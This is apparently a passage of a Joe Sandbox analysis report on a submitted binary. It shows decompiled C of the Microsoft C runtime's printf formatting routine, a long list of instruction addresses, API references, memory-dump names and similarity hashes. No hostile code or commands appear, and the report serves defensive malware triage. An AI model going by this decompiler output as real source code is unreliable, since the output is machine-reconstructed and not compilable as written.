																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																				__eflags =  *(__ebp - 0x10) & 0x00001000;
																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																					__eflags =  *(__ebp - 0x10) & 0x00000020;
																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__edx = 0;
																							__eflags = 0;
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = 0;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = __edx;
																						}
																					} else {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																						__eflags =  *(__ebp - 0x10) & 0x00000040;
																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																							__ecx = __ebp + 0x14;
																							E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																							 *(__ebp - 0x2b4) = __edx;
																						} else {
																							__eax = __ebp + 0x14;
																							__eax = E0041F270(__ebp + 0x14);
																							__ax = __eax;
																							asm("cdq");
																							 *(__ebp - 0x2b8) = __eax;
																							 *(__ebp - 0x2b4) = __edx;
																						}
																					}
																				} else {
																					__eax = __ebp + 0x14;
																					 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																					 *(__ebp - 0x2b4) = __edx;
																				}
																			} else {
																				__ecx = __ebp + 0x14;
																				 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
																				 *(__ebp - 0x2b4) = __edx;
																			}
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																			__eflags =  *(__ebp - 0x10) & 0x00000040;
																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																				goto L170;
																			}
																			goto L166;
																		}
																	case 0xd:
																		goto L0;
																	case 0xe:
																		while(1) {
																			L190:
																			__eflags =  *(__ebp - 0x28);
																			if( *(__ebp - 0x28) != 0) {
																				goto L216;
																			}
																			goto L191;
																		}
																}
															case 8:
																L30:
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																goto L33;
															case 9:
																L31:
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																goto L33;
															case 0xa:
																L29:
																__ecx =  *(__ebp - 0x10);
																__ecx =  *(__ebp - 0x10) | 0x00000001;
																 *(__ebp - 0x10) = __ecx;
																goto L33;
															case 0xb:
																L28:
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																goto L33;
															case 0xc:
																L32:
																__ecx =  *(__ebp - 0x10);
																__ecx =  *(__ebp - 0x10) | 0x00000008;
																__eflags = __ecx;
																 *(__ebp - 0x10) = __ecx;
																goto L33;
															case 0xd:
																L33:
																goto L218;
														}
													} else {
														if(0 == 0) {
															 *(_t557 - 0x314) = 0;
														} else {
															 *(_t557 - 0x314) = 1;
														}
														_t543 =  *(_t557 - 0x314);
														 *(_t557 - 0x278) =  *(_t557 - 0x314);
														if( *(_t557 - 0x278) == 0) {
															_push(L"(\"Incorrect format specifier\", 0)");
															_push(0);
															_push(0x460);
															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
															_push(2);
															_t526 = L0040C820();
															_t559 = _t559 + 0x14;
															if(_t526 == 1) {
																asm("int3");
															}
														}
														L14:
														if( *(_t557 - 0x278) != 0) {
															goto L16;
														} else {
															 *((intOrPtr*)(L00411810(_t543))) = 0x16;
															E0040C660(_t528, _t543, _t555, _t556, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
															 *(_t557 - 0x2f0) = 0xffffffff;
															E00410370(_t557 - 0x40);
															_t499 =  *(_t557 - 0x2f0);
															L229:
															return E00410900(_t499, _t528,  *(_t557 - 0x48) ^ _t557, _t547, _t555, _t556);
														}
													}
												}
												L219:
												__eflags =  *(_t557 - 0x25c);
												if( *(_t557 - 0x25c) == 0) {
													L222:
													 *(_t557 - 0x334) = 1;
													L223:
													_t530 =  *(_t557 - 0x334);
													 *(_t557 - 0x2e0) =  *(_t557 - 0x334);
													__eflags =  *(_t557 - 0x2e0);
													if( *(_t557 - 0x2e0) == 0) {
														_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
														_push(0);
														_push(0x8f5);
														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
														_push(2);
														_t504 = L0040C820();
														_t559 = _t559 + 0x14;
														__eflags = _t504 - 1;
														if(_t504 == 1) {
															asm("int3");
														}
													}
													__eflags =  *(_t557 - 0x2e0);
													if( *(_t557 - 0x2e0) != 0) {
														 *(_t557 - 0x300) =  *(_t557 - 0x24c);
														E00410370(_t557 - 0x40);
														_t499 =  *(_t557 - 0x300);
													} else {
														 *((intOrPtr*)(L00411810(_t530))) = 0x16;
														E0040C660(_t528, _t530, _t555, _t556, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
														 *(_t557 - 0x2fc) = 0xffffffff;
														E00410370(_t557 - 0x40);
														_t499 =  *(_t557 - 0x2fc);
													}
													goto L229;
												}
												L220:
												__eflags =  *(_t557 - 0x25c) - 7;
												if( *(_t557 - 0x25c) == 7) {
													goto L222;
												}
												L221:
												 *(_t557 - 0x334) = 0;
												goto L223;
											}
										}
										L187:
										__eflags =  *(__ebp - 0x24);
										if( *(__ebp - 0x24) == 0) {
											L189:
											 *(__ebp - 4) =  *(__ebp - 4) - 1;
											 *(__ebp - 4) =  *(__ebp - 4) - 1;
											__eax =  *(__ebp - 4);
											 *( *(__ebp - 4)) = 0x30;
											__ecx =  *(__ebp - 0x24);
											__ecx =  *(__ebp - 0x24) + 1;
											__eflags = __ecx;
											 *(__ebp - 0x24) = __ecx;
											goto L190;
										}
										L188:
										__eax =  *(__ebp - 4);
										__ecx =  *( *(__ebp - 4));
										__eflags = __ecx - 0x30;
										if(__ecx == 0x30) {
											goto L190;
										}
										goto L189;
									}
									L183:
									__eax =  *(__ebp - 8);
									asm("cdq");
									__ecx =  *(__ebp - 0x2bc);
									__edx =  *(__ebp - 0x2c0);
									__eax = E00421720( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
									 *(__ebp - 0x2ac) = __eax;
									__eax =  *(__ebp - 8);
									asm("cdq");
									__eax =  *(__ebp - 0x2bc);
									__ecx =  *(__ebp - 0x2c0);
									 *(__ebp - 0x2c0) = E004216B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
									 *(__ebp - 0x2bc) = __edx;
									__eflags =  *(__ebp - 0x2ac) - 0x39;
									if( *(__ebp - 0x2ac) > 0x39) {
										__edx =  *(__ebp - 0x2ac);
										__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
										__eflags = __edx;
										 *(__ebp - 0x2ac) = __edx;
									}
									__eax =  *(__ebp - 4);
									__cl =  *(__ebp - 0x2ac);
									 *( *(__ebp - 4)) = __cl;
									 *(__ebp - 4) =  *(__ebp - 4) - 1;
									 *(__ebp - 4) =  *(__ebp - 4) - 1;
									L181:
									__ecx =  *(__ebp - 0x30);
									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
									__eflags =  *(__ebp - 0x30);
									if( *(__ebp - 0x30) > 0) {
										goto L183;
									}
									goto L182;
								}
							}
							L168:
							__eflags =  *(__ebp - 0x2b8);
							if( *(__ebp - 0x2b8) >= 0) {
								goto L170;
							}
							goto L169;
							L170:
							__ecx =  *(__ebp - 0x2b8);
							 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
							__edx =  *(__ebp - 0x2b4);
							 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
							goto L171;
						}
					}
				}
			}

0x004224f7
0x004224f7
0x004224f7
0x004224f7
0x00422501
0x00422501
0x00422501
0x0042250b
0x0042250b
0x00422511
0x00422513
0x0042251d
0x0042251d
0x00422520
0x00422523
0x00422523
0x0042254a
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00422628
0x00422628
0x0042262f
0x00000000
0x00000000
0x00422631
0x00422631
0x0042263c
0x00422642
0x00422644
0x0042264a
0x0042264d
0x0042264f
0x00422655
0x0042265e
0x00422663
0x00422680
0x00422683
0x00422683
0x00422688
0x0042268d
0x0042268d
0x00422693
0x00422695
0x0042269b
0x004226a1
0x004226a1
0x004226aa
0x004226aa
0x00422693
0x004226b0
0x004226b4
0x004226c2
0x004226c5
0x004226c8
0x004226cf
0x004226d1
0x004226d1
0x004226b6
0x004226b6
0x004226b6
0x004226de
0x004226de
0x004226e4
0x004226e6
0x004226e6
0x004226ed
0x004226f0
0x004226f3
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00422703
0x00422709
0x00422709
0x0042270f
0x0042278c
0x0042278f
0x00422792
0x00422795
0x00422798
0x0042279b
0x004227a1
0x004227a1
0x004227a7
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x004227dc
0x004227df
0x004227df
0x004227e2
0x004227e7
0x004227e7
0x004227ec
0x004227fe
0x004227fe
0x00422801
0x00422813
0x00422813
0x00422816
0x00422818
0x0042281c
0x0042281c
0x00422803
0x00422803
0x00422807
0x00422807
0x004227ee
0x004227ee
0x004227f2
0x004227f2
0x004227ec
0x00422826
0x00422829
0x0042282c
0x00422835
0x00422835
0x00422838
0x0042283a
0x00422841
0x00422845
0x0042284e
0x00422853
0x00422856
0x0042285d
0x00422861
0x00422865
0x00422871
0x00422874
0x00422874
0x00422877
0x0042287c
0x0042287c
0x0042287f
0x00422881
0x00422888
0x0042288c
0x00422895
0x0042289a
0x0042287f
0x0042289d
0x004228a1
0x00422975
0x00422975
0x0042297c
0x00422980
0x00422984
0x00422988
0x00000000
0x004228a7
0x004228a7
0x004228a7
0x004228ab
0x00000000
0x00000000
0x004228b1
0x004228b1
0x004228bb
0x004228be
0x004228c4
0x004228c7
0x004228cd
0x004228cd
0x004228cd
0x004228d9
0x004228dc
0x004228e2
0x004228e4
0x00000000
0x00000000
0x004228ea
0x004228ea
0x004228f3
0x004228fa
0x00422904
0x0042290b
0x0042291a
0x00422926
0x00422929
0x0042292f
0x00422936
0x00422941
0x00422941
0x00000000
0x00422941
0x00422938
0x00422938
0x0042293f
0x0042294d
0x0042294d
0x00422954
0x00422958
0x00422966
0x00000000
0x0042296b
0x00000000
0x0042293f
0x00422973
0x00422990
0x00422990
0x00422997
0x0042299c
0x0042299c
0x0042299f
0x004229a1
0x004229a8
0x004229ac
0x004229b5
0x004229ba
0x0042299f
0x00422997
0x004229bd
0x004229bd
0x004229c1
0x004229c9
0x004229d1
0x004229d1
0x004229d8
0x004229d8
0x00421aaf
0x00421ab5
0x00421ac2
0x00421ac7
0x00000000
0x00421ada
0x00421ae4
0x00421b0b
0x00421af2
0x00421b03
0x00421b03
0x00421ae4
0x00421b15
0x00421b1b
0x00421b27
0x00421b2a
0x00421b38
0x00421b3b
0x00421b48
0x00421bed
0x00421bf3
0x00421bf9
0x00421c00
0x00000000
0x00000000
0x00421c06
0x00421c0c
0x00000000
0x00421c13
0x00421c13
0x00421c2b
0x00421c30
0x00421c33
0x00421c35
0x00421cef
0x00421d02
0x00421d07
0x00000000
0x00421c3b
0x00421c4e
0x00421c53
0x00421c59
0x00421c5b
0x00421c64
0x00421c64
0x00421c67
0x00421c73
0x00421c77
0x00421c7d
0x00421c7f
0x00421c84
0x00421c86
0x00421c8b
0x00421c90
0x00421c92
0x00421c97
0x00421c9a
0x00421c9d
0x00421c9f
0x00421c9f
0x00421c9d
0x00421ca0
0x00421ca0
0x00421ca7
0x00000000
0x00421ca9
0x00421cae
0x00421cca
0x00421cd2
0x00421cdf
0x00421ce4
0x00000000
0x00421ce4
0x00421ca7
0x00000000
0x00421d0f
0x00421d0f
0x00421d16
0x00421d19
0x00421d1c
0x00421d1f
0x00421d22
0x00421d25
0x00421d28
0x00421d2f
0x00421d36
0x00000000
0x00000000
0x00421d42
0x00421d42
0x00421d49
0x00421d55
0x00421d58
0x00421d5e
0x00421d65
0x00000000
0x00000000
0x00421d67
0x00421d67
0x00421d6d
0x00421d6d
0x00421d74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421db7
0x00421db7
0x00421dbe
0x00421dc1
0x00421deb
0x00421dee
0x00421dee
0x00421df1
0x00421df8
0x00421df8
0x00421dfc
0x00421dc3
0x00421dc3
0x00421dcf
0x00421dd2
0x00421dd6
0x00421dd8
0x00421ddb
0x00421ddb
0x00421dde
0x00421de4
0x00421de6
0x00421de6
0x00421de9
0x00000000
0x00000000
0x00421e04
0x00421e04
0x00000000
0x00000000
0x00421e10
0x00421e10
0x00421e17
0x00421e1a
0x00421e3a
0x00421e3d
0x00421e3d
0x00421e47
0x00421e47
0x00421e4b
0x00421e1c
0x00421e1c
0x00421e28
0x00421e2b
0x00421e2f
0x00421e31
0x00421e31
0x00421e38
0x00000000
0x00000000
0x00421e53
0x00421e53
0x00421e5a
0x00421e66
0x00421e69
0x00421e6f
0x00421e76
0x00421f89
0x00000000
0x00421f89
0x00421e7c
0x00421e7c
0x00421e82
0x00421e82
0x00421e89
0x00000000
0x00421ebf
0x00421ebf
0x00421ec2
0x00421ec5
0x00421ec8
0x00421ef0
0x00421ef0
0x00421ef3
0x00421ef6
0x00421ef9
0x00421f1e
0x00421f1e
0x00421f21
0x00421f24
0x00421f27
0x00421f60
0x00421f71
0x00000000
0x00421f71
0x00421f29
0x00421f29
0x00421f2c
0x00421f2f
0x00421f32
0x00000000
0x00000000
0x00421f34
0x00421f34
0x00421f37
0x00421f3a
0x00421f3d
0x00000000
0x00000000
0x00421f3f
0x00421f3f
0x00421f42
0x00421f45
0x00421f48
0x00000000
0x00000000
0x00421f4a
0x00421f4a
0x00421f4d
0x00421f50
0x00421f53
0x00000000
0x00000000
0x00421f55
0x00421f55
0x00421f58
0x00421f5b
0x00421f5e
0x00421f62
0x00000000
0x00421f62
0x00000000
0x00421f5e
0x00421efb
0x00421efb
0x00421efe
0x00421f02
0x00421f05
0x00000000
0x00421f07
0x00421f0a
0x00421f0d
0x00421f10
0x00421f13
0x00421f19
0x00000000
0x00421f19
0x00421f05
0x00421eca
0x00421eca
0x00421ecd
0x00421ed1
0x00421ed4
0x00000000
0x00421ed6
0x00421ed9
0x00421edc
0x00421edf
0x00421ee2
0x00421ee8
0x00000000
0x00421ee8
0x00000000
0x00421f73
0x00421f76
0x00421f79
0x00000000
0x00000000
0x00421e90
0x00421e90
0x00421e93
0x00421e96
0x00421e99
0x00421eb1
0x00421eb4
0x00421eb4
0x00421eb7
0x00421e9b
0x00421e9e
0x00421ea1
0x00421ea7
0x00421eac
0x00421eac
0x00000000
0x00000000
0x00421f7e
0x00421f7e
0x00421f81
0x00421f81
0x00421f86
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f8e
0x00421f8e
0x00421f95
0x00421fa1
0x00421fa4
0x00421faa
0x00421fb1
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00421fb7
0x00421fbd
0x00421fbd
0x00421fc4
0x00000000
0x0042231e
0x0042231e
0x00422325
0x0042232c
0x0042232c
0x0042232f
0x00000000
0x00000000
0x00421fcb
0x00421fce
0x00421fce
0x00421fd4
0x00421fd6
0x00421fd9
0x00421fd9
0x00421fde
0x00421fde
0x00000000
0x00000000
0x0042210b
0x0042210e
0x0042210e
0x00422113
0x00422115
0x00422118
0x00422118
0x0042211e
0x0042211e
0x00000000
0x00000000
0x004224eb
0x004224eb
0x00422501
0x00422501
0x0042250b
0x0042250b
0x00422511
0x00422513
0x0042251d
0x0042251d
0x00422520
0x00422523
0x00422523
0x00000000
0x00000000
0x00422075
0x00422075
0x00422081
0x00422087
0x0042208e
0x0042209c
0x0042209c
0x004220a2
0x004220a5
0x004220b1
0x00422106
0x00000000
0x00422106
0x00422090
0x00422090
0x00422096
0x0042209a
0x004220b6
0x004220b9
0x004220b9
0x004220bf
0x004220e7
0x004220ee
0x004220f4
0x004220f7
0x004220fa
0x00422100
0x00422103
0x004220c1
0x004220c1
0x004220c7
0x004220ca
0x004220cd
0x004220d3
0x004220d6
0x004220d9
0x004220db
0x004220de
0x004220de
0x00000000
0x004220bf
0x00000000
0x00000000
0x00422335
0x00422338
0x0042233b
0x0042233e
0x00422344
0x00422347
0x0042234e
0x00422352
0x0042235d
0x0042235d
0x00422361
0x00422378
0x00422378
0x0042237f
0x00422381
0x00422381
0x00422388
0x00422388
0x0042238f
0x004223a0
0x004223af
0x004223b2
0x004223b6
0x004223cc
0x004223b8
0x004223b8
0x004223bb
0x004223c1
0x004223c7
0x004223c7
0x004223b6
0x004223d6
0x004223d9
0x004223dc
0x004223df
0x004223e2
0x004223e5
0x004223eb
0x004223f1
0x004223f9
0x004223fa
0x004223fd
0x004223fe
0x00422401
0x00422402
0x00422409
0x0042240a
0x0042240d
0x0042240e
0x00422411
0x00422412
0x00422418
0x00422419
0x00422427
0x00422429
0x0042242f
0x0042242f
0x00422435
0x00422437
0x0042243b
0x0042243d
0x00422445
0x00422446
0x00422449
0x0042244a
0x00422458
0x0042245a
0x0042245a
0x0042243b
0x0042245d
0x00422464
0x00422467
0x0042246c
0x0042246c
0x00422472
0x00422474
0x0042247c
0x0042247d
0x00422480
0x00422481
0x00422490
0x00422492
0x00422492
0x00422472
0x00422495
0x00422498
0x0042249b
0x0042249e
0x004224a3
0x004224a9
0x004224ac
0x004224af
0x004224af
0x004224b2
0x004224b2
0x004224b5
0x004224c1
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004227d2
0x00422363
0x00422363
0x0042236a
0x0042236d
0x00000000
0x00000000
0x0042236f
0x0042236f
0x00000000
0x0042236f
0x00422354
0x00422354
0x00000000
0x00000000
0x00421fe1
0x00421fe4
0x00421fe4
0x00421fea
0x00422045
0x0042204d
0x00422054
0x0042205a
0x00422060
0x00421fec
0x00421fec
0x00421ff6
0x00421ffa
0x00422002
0x00422009
0x00422016
0x0042201d
0x00422029
0x0042202f
0x00422036
0x00422038
0x00422038
0x0042203f
0x00422067
0x0042206d
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004224c9
0x004224cc
0x004224cf
0x004224d2
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422227
0x00422227
0x00422233
0x00422239
0x0042223e
0x00422240
0x004222ea
0x004222ed
0x004222ed
0x004222f0
0x00422304
0x0042230a
0x00422310
0x004222f2
0x004222f2
0x004222ff
0x004222ff
0x00422312
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00422246
0x00422246
0x00422246
0x00422248
0x00422256
0x0042224a
0x0042224a
0x0042224a
0x00422260
0x00422266
0x0042226c
0x00422273
0x00422275
0x0042227a
0x0042227c
0x00422281
0x00422286
0x00422288
0x0042228d
0x00422290
0x00422293
0x00422295
0x00422295
0x00422293
0x00422296
0x0042229d
0x004222e5
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x0042229f
0x0042229f
0x004222a4
0x004222c0
0x004222c8
0x004222d2
0x004222d5
0x004222da
0x00000000
0x004222da
0x00000000
0x0042252c
0x0042252c
0x00422536
0x00422536
0x0042253c
0x0042253e
0x00422541
0x00422541
0x00422547
0x00422547
0x0042254a
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422626
0x00000000
0x004224e4
0x004224e4
0x00000000
0x00000000
0x00422121
0x00422121
0x00422125
0x00422133
0x00422136
0x00422127
0x00422127
0x00422127
0x0042213c
0x00422142
0x00422148
0x00422154
0x0042215a
0x0042215a
0x00422160
0x004221c7
0x004221c7
0x004221cb
0x004221cd
0x004221d3
0x004221d3
0x004221d6
0x004221d9
0x004221df
0x004221df
0x004221df
0x004221eb
0x004221ee
0x004221f4
0x004221f6
0x00000000
0x00000000
0x004221f8
0x004221f8
0x004221fe
0x00422201
0x00422203
0x00000000
0x00000000
0x00422205
0x0042220b
0x0042220e
0x0042220e
0x00422216
0x00422216
0x0042221c
0x0042221c
0x0042221f
0x00000000
0x00422162
0x00422162
0x00422162
0x00422166
0x00422168
0x0042216d
0x0042216d
0x00422170
0x00422177
0x0042217a
0x00422180
0x00422180
0x00422180
0x0042218c
0x0042218f
0x00422195
0x00422197
0x00000000
0x00000000
0x00422199
0x00422199
0x0042219f
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221ac
0x004221af
0x004221af
0x004221b7
0x004221bd
0x004221c0
0x004221c2
0x00422222
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00000000
0x004224db
0x004224db
0x0042254a
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422626
0x00000000
0x00000000
0x00000000
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x00000000
0x00421d91
0x00421d94
0x00421d97
0x00000000
0x00000000
0x00421d9c
0x00421d9f
0x00421da4
0x00000000
0x00000000
0x00421d86
0x00421d86
0x00421d89
0x00421d8c
0x00000000
0x00000000
0x00421d7b
0x00421d7e
0x00421d81
0x00000000
0x00000000
0x00421da9
0x00421da9
0x00421dac
0x00421dac
0x00421daf
0x00000000
0x00000000
0x00421db2
0x00000000
0x00000000
0x00421b4e
0x00421b50
0x00421b5e
0x00421b52
0x00421b52
0x00421b52
0x00421b68
0x00421b6e
0x00421b7b
0x00421b7d
0x00421b82
0x00421b84
0x00421b89
0x00421b8e
0x00421b90
0x00421b95
0x00421b9b
0x00421b9d
0x00421b9d
0x00421b9b
0x00421b9e
0x00421ba5
0x00000000
0x00421ba7
0x00421bac
0x00421bc8
0x00421bd0
0x00421bdd
0x00421be2
0x00422aa1
0x00422aae
0x00422aae
0x00421ba5
0x00421b48
0x004229dd
0x004229dd
0x004229e4
0x004229fb
0x004229fb
0x00422a05
0x00422a05
0x00422a0b
0x00422a11
0x00422a18
0x00422a1a
0x00422a1f
0x00422a21
0x00422a26
0x00422a2b
0x00422a2d
0x00422a32
0x00422a35
0x00422a38
0x00422a3a
0x00422a3a
0x00422a38
0x00422a3b
0x00422a42
0x00422a8d
0x00422a96
0x00422a9b
0x00422a44
0x00422a49
0x00422a65
0x00422a6d
0x00422a7a
0x00422a7f
0x00422a7f
0x00000000
0x00422a42
0x004229e6
0x004229e6
0x004229ed
0x00000000
0x00000000
0x004229ef
0x004229ef
0x00000000
0x004229ef
0x004227d2
0x004227a9
0x004227a9
0x004227ad
0x004227ba
0x004227bd
0x004227c0
0x004227c3
0x004227c6
0x004227c9
0x004227cc
0x004227cc
0x004227cf
0x00000000
0x004227cf
0x004227af
0x004227af
0x004227b2
0x004227b5
0x004227b8
0x00000000
0x00000000
0x00000000
0x004227b8
0x00422711
0x00422711
0x00422714
0x00422717
0x0042271e
0x00422725
0x0042272d
0x00422733
0x00422736
0x00422739
0x00422740
0x0042274c
0x00422752
0x00422758
0x0042275f
0x00422761
0x00422767
0x00422767
0x0042276d
0x0042276d
0x00422773
0x00422776
0x0042277c
0x00422781
0x00422784
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00000000
0x00422701
0x004226f3
0x00422633
0x00422633
0x0042263a
0x00000000
0x00000000
0x00000000
0x00422668
0x00422668
0x0042266e
0x00422674
0x0042267a
0x00000000
0x0042267a
0x0042254a
0x00422501

APIs

_get_int64_arg.LIBCMTD ref: 00422558
__aullrem.LIBCMT ref: 00422725
__aulldiv.LIBCMT ref: 00422747

Strings

9, xrefs: 00422758
0, xrefs: 00422513
', xrefs: 004224F7

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: a25174b4c50794a3ca560cdf51d39f9c49a12265e06f077c34e1412efa7c493f
Instruction ID: 4f004d4195c85ab38fbfa75ad0142b025a56a863d4a16f9fe892f674702c208c
Opcode Fuzzy Hash: a25174b4c50794a3ca560cdf51d39f9c49a12265e06f077c34e1412efa7c493f
Instruction Fuzzy Hash: 2341F572E06229EFDB24CF58D999BAEB7B5BB44304F5481DAE008A7340C7789E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040ADB5(intOrPtr __ecx, void* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr _t13;
				intOrPtr _t19;
				void* _t25;
				intOrPtr _t29;
				void* _t31;

				_t25 = __edi;
				E0040D238(E00425896, _t31);
				_push(__ecx);
				_t29 = __ecx;
				 *((intOrPtr*)(_t31 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
